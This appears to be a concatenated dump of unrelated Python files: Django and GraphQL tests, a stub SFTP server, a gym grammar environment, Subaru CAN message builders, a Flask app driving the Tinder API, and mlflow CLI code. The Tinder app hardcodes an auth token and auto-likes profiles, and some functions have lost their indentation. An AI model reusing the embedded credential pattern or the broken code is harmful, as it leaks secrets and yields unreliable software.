def test_robots(client):
    """robots.txt is served."""
    response = client.get(reverse('robots'))
    assert response.status_code == 200
def test_companies_house_oauth2_has_company_redirects(
    settings, client, user, retrieve_profile_data
):
    """Unverified companies are sent to the Companies House OAuth2 endpoint."""
    retrieve_profile_data['is_verified'] = False
    user.company = retrieve_profile_data
    client.force_login(user)
    url = reverse('verify-companies-house')
    response = client.get(url)
    assert response.status_code == 302
    assert urllib.parse.unquote_plus(response.url) == (
        'https://account.companieshouse.gov.uk/oauth2/authorise'
        '?client_id=debug'
        '&redirect_uri=http://testserver/find-a-buyer/'
        'companies-house-oauth2-callback/'
        '&response_type=code&scope=https://api.companieshouse.gov.uk/'
        'company/123456'
    )
@patch.object(forms.CompaniesHouseClient, 'verify_oauth2_code')
def test_companies_house_callback_missing_code(
    mock_verify_oauth2_code, settings, client, user, retrieve_profile_data
):
    """A callback without a ?code= parameter must never hit the OAuth2 API."""
    retrieve_profile_data['is_verified'] = False
    user.company = retrieve_profile_data
    client.force_login(user)
    url = reverse('verify-companies-house-callback')  # missing code
    response = client.get(url)
    assert response.status_code == 200
    assert mock_verify_oauth2_code.call_count == 0
@patch.object(forms.CompaniesHouseClient, 'verify_oauth2_code')
@patch.object(
    api_client.company, 'verify_with_companies_house',
    return_value=create_response(200)
)
def test_companies_house_callback_has_company_calls_companies_house(
    mock_verify_with_companies_house, mock_verify_oauth2_code, settings,
    client, user, retrieve_profile_data
):
    """A valid callback exchanges the code and verifies via the company API."""
    retrieve_profile_data['is_verified'] = False
    user.company = retrieve_profile_data
    client.force_login(user)
    mock_verify_oauth2_code.return_value = create_response(
        status_code=200, json_body={'access_token': 'abc'}
    )
    url = reverse('verify-companies-house-callback')
    response = client.get(url, {'code': '111111111111'})
    assert response.status_code == 302
    assert response.url == str(
        views.CompaniesHouseOauth2CallbackView.success_url
    )
    assert mock_verify_oauth2_code.call_count == 1
    assert mock_verify_oauth2_code.call_args == call(
        code='111111111111',
        redirect_uri=(
            'http://testserver/find-a-buyer/companies-house-oauth2-callback/'
        )
    )
    assert mock_verify_with_companies_house.call_count == 1
    assert mock_verify_with_companies_house.call_args == call(
        sso_session_id=user.session_id,
        access_token='abc',
    )
@patch.object(forms.CompaniesHouseClient, 'verify_oauth2_code')
@patch.object(
    api_client.company, 'verify_with_companies_house',
    return_value=create_response(200)
)
def test_companies_house_callback_has_company_calls_url_prefix(
    mock_verify_with_companies_house, mock_verify_oauth2_code, settings,
    client, user, retrieve_profile_data
):
    """The OAuth2 code exchange must use the expected redirect_uri prefix."""
    retrieve_profile_data['is_verified'] = False
    user.company = retrieve_profile_data
    client.force_login(user)
    mock_verify_oauth2_code.return_value = create_response(
        status_code=200, json_body={'access_token': 'abc'}
    )
    url = reverse('verify-companies-house-callback')
    response = client.get(url, {'code': '111111111111'})
    assert response.status_code == 302
    assert response.url == str(
        views.CompaniesHouseOauth2CallbackView.success_url
    )
    assert mock_verify_oauth2_code.call_count == 1
    assert mock_verify_oauth2_code.call_args == call(
        code='111111111111',
        redirect_uri=(
            'http://testserver/find-a-buyer/companies-house-oauth2-callback/'
        )
    )
@patch.object(forms.CompaniesHouseClient, 'verify_oauth2_code')
@patch.object(
    api_client.company, 'verify_with_companies_house',
    return_value=create_response(500)
)
def test_companies_house_callback_error(
    mock_verify_with_companies_house, mock_verify_oauth2_code, settings,
    client, user, retrieve_profile_data
):
    """A server-side verification failure renders the error template."""
    retrieve_profile_data['is_verified'] = False
    user.company = retrieve_profile_data
    client.force_login(user)
    mock_verify_oauth2_code.return_value = create_response(
        status_code=200, json_body={'access_token': 'abc'}
    )
    url = reverse('verify-companies-house-callback')
    response = client.get(url, {'code': '111111111111'})
    assert response.status_code == 200
    assert response.template_name == (
        views.CompaniesHouseOauth2CallbackView.error_template
    )
@patch.object(forms.CompaniesHouseClient, 'verify_oauth2_code')
def test_companies_house_callback_invalid_code(
    mock_verify_oauth2_code, settings, client, user, retrieve_profile_data
):
    """A 400 from the code exchange shows the invalid-code message."""
    retrieve_profile_data['is_verified'] = False
    user.company = retrieve_profile_data
    client.force_login(user)
    mock_verify_oauth2_code.return_value = create_response(400)
    url = reverse('verify-companies-house-callback')
    response = client.get(url, {'code': '111111111111'})
    assert response.status_code == 200
    assert b'Invalid code.' in response.content
@patch.object(forms.CompaniesHouseClient, 'verify_oauth2_code')
def test_companies_house_callback_unauthorized(
    mock_verify_oauth2_code, settings, client, user, retrieve_profile_data
):
    """A 401 from the code exchange is reported the same as an invalid code."""
    retrieve_profile_data['is_verified'] = False
    user.company = retrieve_profile_data
    client.force_login(user)
    mock_verify_oauth2_code.return_value = create_response(401)
    url = reverse('verify-companies-house-callback')
    response = client.get(url, {'code': '111111111111'})
    assert response.status_code == 200
    assert b'Invalid code.' in response.content
def test_verify_company_has_company_user(
settings, client, user, retrieve_profile_data
):
retrieve_profile_data['is_verified'] = False
user.company = retrieve_profile_data
client.force_login(user)
url = reverse('verify-company-hub')
response = client.get(url)
assert response.status_code == 200
assert response.template_name == [views.CompanyVerifyView.template_name]
def test_verify_company_address_feature_flag_on(
    settings, client, user, retrieve_profile_data
):
    """The verify-by-address page is reachable for an unverified company."""
    retrieve_profile_data['is_verified'] = False
    user.company = retrieve_profile_data
    client.force_login(user)
    response = client.get(reverse('verify-company-address'))
    assert response.status_code == 200
@patch.object(api_client.company, 'profile_update')
def test_verify_company_address_end_to_end(
    mock_profile_update, settings, send_verification_letter_end_to_end,
    retrieve_profile_data
):
    """Completing the letter-verification flow updates the profile exactly once."""
    retrieve_profile_data['is_verified'] = False
    mock_profile_update.return_value = create_response(200)
    view = views.SendVerificationLetterView
    response = send_verification_letter_end_to_end()
    assert response.status_code == 200
    assert response.template_name == view.templates[view.SENT]
    assert response.context_data['profile_url'] == 'http://profile.trade.great:8006/profile/business-profile/'
    assert mock_profile_update.call_count == 1
    assert mock_profile_update.call_args == call(
        data={'postal_full_name': 'Jeremy'},
        sso_session_id='123'
    )
def test_company_address_verification_backwards_compatible_feature_flag_on(
    settings, client
):
    """The historic letter-verification URL redirects to the current one."""
    url = reverse('verify-company-address-historic-url')
    response = client.get(url)
    assert response.status_code == 302
    assert response.get('Location') == reverse('verify-company-address')
def test_case_study_create_backwards_compatible_url(client):
    """The legacy case-study-create URL redirects to the SSO profile."""
    url = reverse('company-case-study-create-backwards-compatible')
    response = client.get(url)
    assert response.status_code == 302
    assert response.url == urls.domestic.SINGLE_SIGN_ON_PROFILE
def test_buyer_csv_dump_no_token(client):
    """The buyers CSV endpoint rejects requests without an auth token."""
    url = reverse('buyers-csv-dump')
    response = client.get(url)
    assert response.status_code == 403
    assert response.content == b'Token not provided'
@patch('company.views.api_client')
def test_buyer_csv_dump(mocked_api_client, client):
    """The buyers CSV endpoint proxies the API response body and headers."""
    mocked_api_client.buyer.get_csv_dump.return_value = Mock(
        content='abc',
        headers={
            'Content-Type': 'foo',
            'Content-Disposition': 'bar'
        }
    )
    url = reverse('buyers-csv-dump')
    response = client.get(url+'?token=debug')
    assert mocked_api_client.buyer.get_csv_dump.called is True
    # Bug fix: the original asserted `mock.called_once_with(...)`, which is not
    # a Mock assertion method -- it auto-creates a truthy child mock, so the
    # assert could never fail. Use the real assertion instead.
    mocked_api_client.buyer.get_csv_dump.assert_called_once_with(token='debug')
    assert response.content == b'abc'
    assert response.headers['Content-Type'] == 'foo'
    assert response.headers['Content-Disposition'] == 'bar'
@patch('company.views.api_client')
def test_supplier_csv_dump(mocked_api_client, client):
    """The suppliers CSV endpoint proxies the API response body and headers."""
    mocked_api_client.supplier.get_csv_dump.return_value = Mock(
        content='abc',
        headers={
            'Content-Type': 'foo',
            'Content-Disposition': 'bar'
        }
    )
    url = reverse('suppliers-csv-dump')
    response = client.get(url+'?token=debug')
    assert mocked_api_client.supplier.get_csv_dump.called is True
    # Bug fix: `assert mock.called_once_with(...)` is not a Mock assertion
    # method (it auto-creates a truthy child mock, so it always passed).
    mocked_api_client.supplier.get_csv_dump.assert_called_once_with(
        token='debug'
    )
    assert response.content == b'abc'
    assert response.headers['Content-Type'] == 'foo'
    assert response.headers['Content-Disposition'] == 'bar'
|
15,120 | cc4f8ae28425cf2e1469bea62fec559e615d0403 | from unittest.mock import Mock
from graphql import graphql
from ariadne import make_executable_schema, resolve_to
def test_query_root_type_default_resolver():
    """A resolver-map entry on the root Query type resolves its field."""
    type_defs = """
        type Query {
            test: String
        }
    """
    resolvers = {"Query": {"test": lambda *_: "success"}}
    schema = make_executable_schema(type_defs, resolvers)
    result = graphql(schema, "{ test }")
    assert result.errors is None
    assert result.data == {"test": "success"}
def test_query_custom_type_default_resolver():
    """A dict returned by a resolver is resolved field-by-field by the default resolver."""
    type_defs = """
        type Query {
            test: Custom
        }
        type Custom {
            node: String
        }
    """
    resolvers = {"Query": {"test": lambda *_: {"node": "custom"}}}
    schema = make_executable_schema(type_defs, resolvers)
    result = graphql(schema, "{ test { node } }")
    assert result.errors is None
    assert result.data == {"test": {"node": "custom"}}
def test_query_custom_type_object_default_resolver():
    """Object attributes are also picked up by the default resolver."""
    type_defs = """
        type Query {
            test: Custom
        }
        type Custom {
            node: String
        }
    """
    resolvers = {"Query": {"test": lambda *_: Mock(node="custom")}}
    schema = make_executable_schema(type_defs, resolvers)
    result = graphql(schema, "{ test { node } }")
    assert result.errors is None
    assert result.data == {"test": {"node": "custom"}}
def test_query_custom_type_custom_resolver():
    """An explicit resolver on a custom type overrides the default resolution."""
    type_defs = """
        type Query {
            test: Custom
        }
        type Custom {
            node: String
        }
    """
    resolvers = {
        "Query": {"test": lambda *_: {"node": "custom"}},
        "Custom": {"node": lambda *_: "deep"},
    }
    schema = make_executable_schema(type_defs, resolvers)
    result = graphql(schema, "{ test { node } }")
    assert result.errors is None
    assert result.data == {"test": {"node": "deep"}}
def test_query_custom_type_merged_custom_default_resolvers():
    """Custom and default resolvers can coexist on different fields of one type."""
    type_defs = """
        type Query {
            test: Custom
        }
        type Custom {
            node: String
            default: String
        }
    """
    resolvers = {
        "Query": {"test": lambda *_: {"node": "custom", "default": "ok"}},
        "Custom": {"node": lambda *_: "deep"},
    }
    schema = make_executable_schema(type_defs, resolvers)
    result = graphql(schema, "{ test { node default } }")
    assert result.errors is None
    assert result.data == {"test": {"node": "deep", "default": "ok"}}
def test_query_with_argument():
    """Field arguments arrive as keyword arguments on the resolver."""
    type_defs = """
        type Query {
            test(returnValue: Int!): Int
        }
    """
    def resolve_test(*_, returnValue):
        assert returnValue == 4
        # NOTE: the resolver returns the string "42"; the asserted data below
        # expects 42, relying on GraphQL Int serialization coercing it.
        return "42"
    resolvers = {"Query": {"test": resolve_test}}
    schema = make_executable_schema(type_defs, resolvers)
    result = graphql(schema, "{ test(returnValue: 4) }")
    assert result.errors is None
    assert result.data == {"test": 42}
def test_query_with_input():
    """GraphQL input objects arrive as plain dicts."""
    type_defs = """
        type Query {
            test(data: TestInput): Int
        }
        input TestInput {
            value: Int
        }
    """
    def resolve_test(*_, data):
        assert data == {"value": 4}
        return "42"
    resolvers = {"Query": {"test": resolve_test}}
    schema = make_executable_schema(type_defs, resolvers)
    result = graphql(schema, "{ test(data: { value: 4 }) }")
    assert result.errors is None
    assert result.data == {"test": 42}
def test_mapping_resolver():
    """resolve_to maps a GraphQL field name to a differently-named dict key."""
    type_defs = """
        type Query {
            user: User
        }
        type User {
            firstName: String
        }
    """
    resolvers = {
        "Query": {"user": lambda *_: {"first_name": "Joe"}},
        "User": {"firstName": resolve_to("first_name")},
    }
    schema = make_executable_schema(type_defs, resolvers)
    result = graphql(schema, "{ user { firstName } }")
    assert result.errors is None
    assert result.data == {"user": {"firstName": "Joe"}}
def test_mapping_resolver_to_object_attribute():
    """resolve_to also resolves against object attributes, not just dict keys."""
    type_defs = """
        type Query {
            user: User
        }
        type User {
            firstName: String
        }
    """
    resolvers = {
        "Query": {"user": lambda *_: Mock(first_name="Joe")},
        "User": {"firstName": resolve_to("first_name")},
    }
    schema = make_executable_schema(type_defs, resolvers)
    result = graphql(schema, "{ user { firstName } }")
    assert result.errors is None
    assert result.data == {"user": {"firstName": "Joe"}}
def test_default_resolver(mock_user, first_name, avatar, blog_posts):
    """The default resolver calls callables with the field's kwargs.

    Fixtures (mock_user, first_name, avatar, blog_posts) are supplied by the
    test suite's conftest.
    """
    type_defs = """
        type Query {
            user: User
        }
        type User {
            firstName: String
            avatar(size: String): String
            blogPosts(published: Boolean): Int
        }
    """
    resolvers = {
        "Query": {"user": lambda *_: mock_user},
        "User": {
            "firstName": resolve_to("first_name"),
            "blogPosts": resolve_to("blog_posts"),
        },
    }
    schema = make_executable_schema(type_defs, resolvers)
    query = """
        query User($size: String, $published: Boolean) {
            user {
                firstName
                avatar(size: $size)
                blogPosts(published: $published)
            }
        }
    """
    variables = {"size": "200x300", "published": True}
    result = graphql(schema, query, variables=variables)
    assert result.errors is None
    assert result.data == {
        "user": {"firstName": first_name, "avatar": avatar, "blogPosts": blog_posts}
    }
    mock_user.avatar.assert_called_with(size=variables["size"])
    mock_user.blog_posts.assert_called_once_with(published=variables["published"])
|
15,121 | 26a302aaa964964b1aaed0b449ca18f559e60a82 | ###############################################################################
#
# Copyright (c) 2011-2017 Ruslan Spivak
# Copyright (c) 2020 Steven Fernandez <steve@lonetwin.net>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
###############################################################################
__author__ = 'Steven Fernandez <steve@lonetwin.net>'
import argparse
import logging
import os
import pwd
import socket
import sys
import paramiko
from sftpserver.stub_sftp import StubSFTPServer, ssh_server
# - Defaults
HOST, PORT = 'localhost', 3373
ROOT = StubSFTPServer.ROOT
LOG_LEVEL = logging.getLevelName(logging.INFO)
MODE = 'threaded'
BACKLOG = 10
def setup_logging(level, mode):
    """Configure logging and return this module's logger at *level*.

    In forked mode the PID is prepended to the format so records from
    separate worker processes can be told apart.
    """
    fmt = logging.BASIC_FORMAT if mode == 'threaded' else '%(process)d:' + logging.BASIC_FORMAT
    logging.basicConfig(format=fmt)
    # paramiko is very chatty at DEBUG; pin it to INFO regardless of *level*.
    logging.getLogger('paramiko').setLevel(logging.INFO)
    module_logger = logging.getLogger(__name__)
    module_logger.setLevel(level)
    return module_logger
def setup_transport(connection):
    """Wrap *connection* in a started paramiko Transport serving the stub SFTP subsystem."""
    t = paramiko.Transport(connection)
    t.add_server_key(StubSFTPServer.KEY)
    t.set_subsystem_handler('sftp', paramiko.SFTPServer, StubSFTPServer)
    t.start_server(server=ssh_server)
    return t
def start_server(host=HOST, port=PORT, root=ROOT, keyfile=None, level=LOG_LEVEL, mode=MODE):
    """Accept SFTP connections forever, one thread or forked process each.

    host/port: listen address; root: directory served; keyfile: path to the
    server's RSA private key (a throwaway 1024-bit key is generated when
    omitted); level: log level name; mode: 'threaded' or 'forked'.
    """
    logger = setup_logging(level, mode)
    if keyfile is None:
        # Ephemeral key: fine for testing, but the host identity changes on
        # every start.
        server_key = paramiko.RSAKey.generate(bits=1024)
    else:
        server_key = paramiko.RSAKey.from_private_key_file(keyfile)
    StubSFTPServer.ROOT = root
    StubSFTPServer.KEY = server_key
    logger.debug('Serving %s over sftp at %s:%s', root, host, port)
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, True)
    server_socket.bind((host, port))
    server_socket.listen(BACKLOG)
    sessions = []
    while True:
        connection, _ = server_socket.accept()
        if mode == 'forked':
            logger.debug('Starting a new process')
            pid = os.fork()
            if pid == 0:
                # Child: serve this single connection, then exit.
                transport = setup_transport(connection)
                channel = transport.accept()
                username = transport.get_username()
                if os.geteuid() == 0:
                    user = pwd.getpwnam(username)
                    logger.debug('Dropping privileges, will run as %s', user.pw_name)
                    os.setgid(user.pw_gid)
                    os.setuid(user.pw_uid)
                transport.join()
                # Bug fix: the original logged `user.pw_name` here, which is
                # unbound (UnboundLocalError) when not running as root.
                logger.debug("session for %s has ended. Exiting", username)
                sys.exit()
            else:
                sessions.append(pid)
                # Opportunistically reap at most one exited child per accepted
                # connection (non-blocking).
                pid, _ = os.waitpid(-1, os.WNOHANG)
                if pid:
                    sessions.remove(pid)
        else:
            logger.debug('Starting a new thread')
            transport = setup_transport(connection)
            channel = transport.accept()
            sessions.append(channel)
        logger.debug('%s active sessions', len(sessions))
def main():
    """Parse CLI options and start the stub SFTP server."""
    usage = """usage: sftpserver [options]"""
    parser = argparse.ArgumentParser(usage=usage)
    parser.add_argument(
        '--host', dest='host', default=HOST,
        help='listen on HOST [default: %(default)s]'
    )
    parser.add_argument(
        '-p', '--port', dest='port', type=int, default=PORT,
        help='listen on PORT [default: %(default)d]'
    )
    parser.add_argument(
        '-l', '--level', dest='level', default=LOG_LEVEL,
        help='Debug level: WARNING, INFO, DEBUG [default: %(default)s]'
    )
    parser.add_argument(
        '-k', '--keyfile', dest='keyfile', metavar='FILE',
        help='Path to private key, for example /tmp/test_rsa.key'
    )
    parser.add_argument(
        '-r', '--root', dest='root', default=ROOT,
        help='Directory to serve as root for the server'
    )
    parser.add_argument(
        '-m', '--mode', default=MODE, const=MODE, nargs='?', choices=('threaded', 'forked'),
        help='Mode to run server in [default: %(default)s]'
    )
    args = parser.parse_args()
    # Refuse to start unless the root directory actually exists.
    if not os.path.isdir(args.root):
        parser.print_help()
        sys.exit(-1)
    start_server(args.host, args.port, args.root, args.keyfile, args.level, args.mode)
if __name__ == '__main__':
main()
|
15,122 | 8c4c03066fe896c721ca84d123dc2512616fe55c | import logging
import gym
from gym import error, spaces, utils
from gym.utils import seeding
import numpy as np
logger = logging.getLogger(__name__)
class TomitaE(gym.Env):
    """
    Tomita grammar environment: a binary string is accepted iff it contains an
    even number of 0s and an even number of 1s.
    Alphabet : {0,1}
    The agent observes one symbol per step; on the terminal step it is
    rewarded for emitting the accept/reject action matching the grammar.
    """
    metadata = {'render.modes': ['human']}
    def __init__(self):
        self.alphabet = [0, 1]
        self.total_actions = 2  # 0: Reject ; 1: Accept
        self.accept_action = 1
        self.reject_action = 0
        self.action_space = spaces.Discrete(self.total_actions)
        self._clock = None  # step counter within the current episode
        self.seed()
        self.min_steps = 1
        self.max_steps = 50
        self.enc = True
        self.all_observations = []
        # When True, the episode's string is pre-generated to be accepted.
        self._enforce_valid_string = True
        self._counts = [0, 0] # each alphabet count
    def step(self, action):
        if action >= self.total_actions:
            raise ValueError("action must be one of %r" % range(self.total_actions))
        self._clock += 1
        done = True if self._clock >= self.max_episode_steps else False
        # Reward only on the terminal step, for the correct accept/reject call.
        reward = 1 if done and self.get_desired_action() == action else 0
        # NOTE(review): on the terminal step this returns a bare scalar while
        # _get_observation returns np.array([obs]) -- confirm downstream code
        # tolerates the inconsistent observation shape.
        next_obs = self._get_observation() if not done else self._get_random_observation()
        info = {'desired_action': self.get_desired_action() if not done else None}
        return next_obs, reward, done, info
    def _get_random_observation(self):
        # Filler observation for the terminal step (not recorded in counts).
        return self.np_random.choice(self.alphabet)
    def _get_observation(self):
        if self._enforce_valid_string:
            # Replay the pre-generated accepted string symbol by symbol.
            obs = self._generated_obs[self._clock]
        else:
            # Sample from the episode's biased Bernoulli distribution.
            obs = self.np_random.choice(self.alphabet, p=self._probs)
        self.all_observations.append(obs)
        self._counts[obs] += 1
        return np.array([obs])
    def get_desired_action(self):
        return self.accept_action if self.is_string_valid() else self.reject_action
    def is_string_valid(self):
        # Accepted iff both symbol counts are even.
        return self._counts[0] % 2 == 0 and self._counts[1] % 2 == 0
    def reset(self):
        self._clock = 0
        # ~40% of episodes force a valid (accepted) string; the rest sample
        # freely and are usually rejected.
        self._enforce_valid_string = (self.np_random.random_sample() <= 0.4)
        if self._enforce_valid_string:
            # Even count of one symbol plus an even count of the other,
            # shuffled -> guaranteed accepted string.
            obs = self.np_random.choice([0, 1])
            obs_count = self.np_random.choice(range(2, self.max_steps, 2))
            non_obs_count = self.np_random.choice(range(0, self.max_steps - obs_count + 1, 2))
            self._generated_obs = [obs] * obs_count
            self._generated_obs += [1 - obs] * non_obs_count
            self.np_random.shuffle(self._generated_obs)
            self.max_episode_steps = len(self._generated_obs)
        else:
            self.max_episode_steps = self.np_random.choice(range(self.min_steps, self.max_steps + 1))
            self._probs = self.np_random.random_sample()
            self._probs = [self._probs, 1 - self._probs]
            self.np_random.shuffle(self._probs)
        self.all_observations = []
        self._counts = [0, 0] # each alphabet count
        obs = self._get_observation()
        return obs
    def close(self):
        pass
    def seed(self, seed=None):
        # NOTE(review): seeding.hash_seed was removed in newer gym releases --
        # verify the pinned gym version still provides it.
        self.np_random, seed1 = seeding.np_random(seed)
        seed2 = seeding.hash_seed(seed1 + 1) % 2 ** 31
        return [seed1, seed2]
    def render(self, mode="human", close=False):
        pass
|
15,123 | 3f26a4f6f584b1ee8e69e248d03b44840c47968f | s1 = {1, 2, 3, 4}
print(s1)
item = 2
# set.discard removes the element if present and is a no-op otherwise, which
# replaces the explicit membership check + remove() of the original.
s1.discard(item)
print(s1)
s1.discard(10)  # absent element: discard() does not raise (remove() would)
print(s1)
|
15,124 | bc1034e482149a49f768c30eec8b0dc4f41ab0fc | import copy
from cereal import car
VisualAlert = car.CarControl.HUDControl.VisualAlert
def create_steering_control(packer, apply_steer, frame, steer_step):
    """Build the ES_LKAS steering command message.

    The 4-bit rolling counter advances once every `steer_step` frames.
    """
    # Bug fix: `/` is float division on Python 3, which made the CAN counter a
    # float (e.g. 1.5); use integer division so Counter is an int in 0..15.
    idx = (frame // steer_step) % 16
    values = {
        "Counter": idx,
        "LKAS_Output": apply_steer,
        "LKAS_Request": 1 if apply_steer != 0 else 0,
        "SET_1": 1
    }
    return packer.make_can_msg("ES_LKAS", 0, values)
def create_steering_status(packer, apply_steer, frame, steer_step):
    """Build an ES_LKAS_State message with an empty payload (all-default signals)."""
    return packer.make_can_msg("ES_LKAS_State", 0, {})
def create_es_distance(packer, es_distance_msg, pcm_cancel_cmd):
    """Pass through the stock ES_Distance message, optionally requesting cruise cancel."""
    values = copy.copy(es_distance_msg)
    values.update({"Cruise_Cancel": 1} if pcm_cancel_cmd else {})
    return packer.make_can_msg("ES_Distance", 0, values)
def create_es_lkas(packer, es_lkas_msg, visual_alert, left_line, right_line):
    """Pass through ES_LKAS_State, overlaying hands-on-wheel and lane-line flags."""
    values = copy.copy(es_lkas_msg)
    if visual_alert == VisualAlert.steerRequired:
        values["Keep_Hands_On_Wheel"] = 1
    values["LKAS_Left_Line_Visible"] = int(left_line)
    values["LKAS_Right_Line_Visible"] = int(right_line)
    return packer.make_can_msg("ES_LKAS_State", 0, values)
# *** Subaru Pre-global ***
def subaru_preglobal_checksum(packer, values, addr):
    """Pre-global Subaru checksum: byte-sum of the first 7 payload bytes, mod 256."""
    payload = packer.make_can_msg(addr, 0, values)[2]
    return sum(payload[:7]) % 256
def create_preglobal_steering_control(packer, apply_steer, frame, steer_step):
    """Build the pre-global ES_LKAS steering command (3-bit counter + checksum)."""
    # Bug fix: `/` is float division on Python 3, producing a float counter;
    # use integer division so Counter is an int in 0..7.
    idx = (frame // steer_step) % 8
    values = {
        "Counter": idx,
        "LKAS_Command": apply_steer,
        "LKAS_Active": 1 if apply_steer != 0 else 0
    }
    values["Checksum"] = subaru_preglobal_checksum(packer, values, "ES_LKAS")
    return packer.make_can_msg("ES_LKAS", 0, values)
def create_es_throttle_control(packer, fake_button, es_accel_msg):
    """Pass through ES_CruiseThrottle with a spoofed cruise-button press and fresh checksum."""
    values = copy.copy(es_accel_msg)
    values["Button"] = fake_button
    values["Checksum"] = subaru_preglobal_checksum(packer, values, "ES_CruiseThrottle")
    return packer.make_can_msg("ES_CruiseThrottle", 0, values)
|
15,125 | 4a69780f15ac017905a292691ff4a39559bc9e13 | from flask import Flask, render_template, request
import urllib
import json
from PIL import Image
import numpy as np
app = Flask(__name__)
TOKEN = '4b25cd19-cfa6-46b0-9c16-67745a6ca844'
@app.route('/likes', methods=['GET'])
def likes():
    # Render the profiles that already liked the user (fast-match teasers).
    token = TOKEN if request.args.get(
        'token') is None else request.args.get('token')
    url = 'https://api.gotinder.com/v2/fast-match/teasers'
    data = get_data(token, url)
    return render_template('likes.html', data=data.get('data').get('results'), token=token)
@app.route('/search', methods=['GET'])
def search():
    # Render the current swipe candidates (recs core).
    token = TOKEN if request.args.get(
        'token') is None else request.args.get('token')
    url = 'https://api.gotinder.com/v2/recs/core'
    data = get_data(token, url)
    return render_template('search.html', data=data.get('data').get('results'), token=token)
@app.route('/match', methods=['GET'])
def match():
    # Send a like for the profile with the given id.
    # NOTE(review): this GET endpoint has a side effect (sends the like).
    token = TOKEN if request.args.get(
        'token') is None else request.args.get('token')
    id = request.args.get('id')
    url = 'https://api.gotinder.com/like/{}'.format(id)
    get_data(token, url)
    return "NEW MATCH!!!"
@app.route('/auto-match', methods=['GET'])
def auto_match():
    # Cross-reference incoming likes with swipe candidates by comparing the
    # liker's first photo against every candidate photo pixel-by-pixel, and
    # like each candidate that matches.
    count = 0
    token = TOKEN if request.args.get(
        'token') is None else request.args.get('token')
    url = 'https://api.gotinder.com/v2/fast-match/teasers'
    likes = get_data(token, url).get('data').get('results')
    url = 'https://api.gotinder.com/v2/recs/core'
    candidates = get_data(token, url).get('data').get('results')
    for like in likes:
        for candidate in candidates:
            for photo in candidate.get('user').get('photos'):
                if is_same(like.get('user').get('photos')[0].get('url'), photo.get('url')):
                    url = 'https://api.gotinder.com/like/{}'.format(
                        candidate.get('user').get('_id'))
                    get_data(token, url)
                    count += 1
                    # NOTE(review): this break only exits the photo loop; the
                    # same like is still compared against later candidates.
                    break
    # NOTE(review): 'MATCHS' looks like a typo for 'MATCHES'; kept as-is
    # because it is user-visible runtime output.
    response = "{} NEW MATCHS!!!" if count > 1 else "{} NEW MATCH!!!"
    response += " Try again" if count == 0 else ""
    return response.format(count)
def get_data(token, url):
    """GET *url* with the Tinder auth token and return the parsed JSON body."""
    headers = {}
    headers['X-Auth-Token'] = token
    # Fix: the original bound a local named `request`, shadowing flask's
    # imported `request` object inside this function; use a distinct name.
    req = urllib.request.Request(url, headers=headers)
    response = urllib.request.urlopen(req).read()
    data = json.loads(response.decode("utf-8"))
    return data
def exclude_profile_list(data, id):
    """Remove the profile with user id *id* from data['data']['results'], if present.

    Returns *data* (mutated in place). A missing id or a malformed payload is
    ignored.
    """
    try:
        results = data['data']['results']
        index = [item['user']['_id'] for item in results].index(id)
        del results[index]
    except (KeyError, TypeError, ValueError):
        # ValueError: id not found; KeyError/TypeError: unexpected payload
        # shape. (The original's bare `except:` also swallowed these.)
        pass
    return data
def is_same(url1, url2):
    """Return True when the two image URLs contain pixel-identical images."""
    try:
        size = (300, 300)  # NOTE(review): unused -- images are compared at full size
        image1 = Image.open(urllib.request.urlopen(url1))
        image2 = Image.open(urllib.request.urlopen(url2))
        return list(image1.getdata()) == list(image2.getdata())
    except:
        # Best-effort: any download/decode failure counts as "not the same".
        return False
if __name__ == "__main__":
app.run(host='0.0.0.0', debug=True)
|
15,126 | f1abd07653d5b9722f8018f48bc5e5a00dbcd47d | def fn():
l,m,n = map(int,input().strip().split())
a = list(map(int,input().strip().split()))
b = list(map(int,input().strip().split()))
c = list(map(int,input().strip().split()))
a1 = set(a)
b1 = set(b)
c1 = set(c)
out1 = {}
out2 = {}
out1 = a1.intersection(b1)
out2 = out1.intersection(c1)
if len(out2) != 0:
print(*sorted(out2))
else:
print("-1")
for _ in range(int(input().strip())):
fn()
|
15,127 | 3085d80835e0cb3ce9c5816d36a3eea56e3f7b28 | from __future__ import absolute_import
import os
from six.moves import shlex_quote
import subprocess
import sys
import click
import pandas
from mlflow.pyfunc import load_pyfunc, scoring_server, _load_model_env
from mlflow.tracking.utils import _get_model_log_dir
from mlflow.utils import cli_args
from mlflow.utils.logging_utils import eprint
from mlflow.projects import _get_conda_bin_executable, _get_or_create_conda_env
def _rerun_in_conda(conda_env_path):
    """ Rerun CLI command inside a to-be-created conda environment."""
    conda_env_name = _get_or_create_conda_env(conda_env_path)
    activate_path = _get_conda_bin_executable("activate")
    commands = []
    commands.append("source {} {}".format(activate_path, conda_env_name))
    # Re-issue the exact same CLI invocation (shell-quoted), adding --no-conda
    # so the re-run does not recurse back into this function.
    safe_argv = [shlex_quote(arg) for arg in sys.argv]
    commands.append(" ".join(safe_argv) + " --no-conda")
    commandline = " && ".join(commands)
    eprint("=== Running command '{}'".format(commandline))
    child = subprocess.Popen(["bash", "-c", commandline], close_fds=True)
    exit_code = child.wait()
    return exit_code
# Group container only; subcommands register themselves via @commands.command.
# The docstring below is click's user-visible help text -- left unchanged.
@click.group("pyfunc")
def commands():
    """
    Serve Python models locally.
    To serve a model associated with a run on a tracking server, set the MLFLOW_TRACKING_URI
    environment variable to the URL of the desired server.
    """
    pass
@commands.command("serve")
@cli_args.MODEL_PATH
@cli_args.RUN_ID
